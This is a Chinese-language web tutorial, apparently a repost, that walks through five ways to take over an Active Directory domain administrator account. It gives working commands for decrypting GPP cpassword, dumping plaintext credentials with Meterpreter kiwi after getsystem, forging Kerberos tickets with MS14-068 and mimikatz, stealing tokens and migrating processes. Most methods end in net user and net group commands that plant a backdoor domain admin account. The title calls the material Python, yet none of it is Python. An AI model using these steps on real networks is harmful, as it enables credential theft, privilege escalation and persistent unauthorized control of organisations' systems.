首頁 > 軟體

Python安全獲取域管理員許可權幾種方式操作範例

2021-10-14 19:00:34

在大多數情況下,攻擊者可以通過定位域管理員所登入的伺服器,利用漏洞獲取伺服器system許可權,找到域管理的賬號、程序或是身份驗證令牌,從而獲取域管理員許可權

第1種方式:利用GPP漏洞獲取域管理許可權

SYSVOL是域內的共用資料夾,用來存放登入指令碼、組策略指令碼等資訊。當域管理員通過組策略修改密碼時,在指令碼中引入使用者密碼,就可能導致安全問題。

(1)存取SYSVOL共用資料夾,搜尋包含「cpassword」的XML檔案,獲取AES加密的密碼。

(2)使用kali自帶的gpp-decrypt進行破解,從而獲取域賬號密碼,直接登入域管理員賬號獲取存取許可權。

第2種方式:獲取伺服器明文登入密碼

使用kiwi模組需要system許可權,所以我們在使用該模組之前需要將當前MSF中的shell提升為system。提到system有兩個方法,一是當前的許可權是administrator使用者,二是利用其它手段先提權到administrator使用者。然後administrator使用者可以直接getsystem到system許可權。

meterpreter > getuid
Server username: BYPASS-E97BA3FCAdministrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

載入kiwi模組

load kiwi

列舉系統中的明文密碼

creds_all

第3種方式:使用MS14-068漏洞進行提權

MS14068是一個能夠使普通使用者提權到域控許可權的許可權提升漏洞。攻擊者可以通過構造特定的請求包來達到提升許可權的目的。

攻擊流程:

第一步:利用MS14-068偽造生成TGT

MS14-068.exe -u [email protected] -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com

第二步:利用mimikatz將工具得到的TGT票據寫入記憶體,建立快取證書

mimikatz#kerberos::ptc [email protected]

第三步:獲取域管理員許可權。建立一個 test 賬號並加入域管理員組,從而隨時可以登入域控主機進行操作。

PsExec.exe \dc cmd.exe 
// 新增test使用者
net user test abc123! /add /domain
// 把 test 使用者新增進域管理員組
net group "domain admins"  test /add /domain
// 檢視域管理員
net group "domain admins" /domain

第4種方式:竊取域管理員令牌

當有域控賬戶登陸至伺服器時可使用令牌模擬進行滲透取得域控許可權。

1、入侵域管理員所在的伺服器,竊取域管理員的令牌,從而控制整個域。

2、直接在meterpreter shell上執行新增域管理員

add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址

第5種方式:程序遷移

入侵了域管理員所登入的伺服器,將程序遷移到域管理員所執行的程序,就可以獲得域管理員許可權。

1、獲取域管理員列表

net group "Domain Admins" /domain

2、利用ps找到域管理員(TESTbypass)所執行的程序,然後將shell程序遷移到域管理員所執行的程序中,成功後就獲得了域管理員許可權。如下圖所示:

3、輸入shell命令獲取OS shell,在本機上使用Windows命令新增新的域管理員:

// 新增test使用者
net user test [email protected] /add /domain
// 把 test 使用者新增進域管理員組
net group "domain admins"  test /add /domain

4、成功新增了域管理員賬號test。

以上就是Python安全獲取域管理員許可權幾種方式操作範例的詳細內容,更多關於Python獲取域管理員許可權方式的資料請關注it145.com其它相關文章!


IT145.com E-mail:sddin#qq.com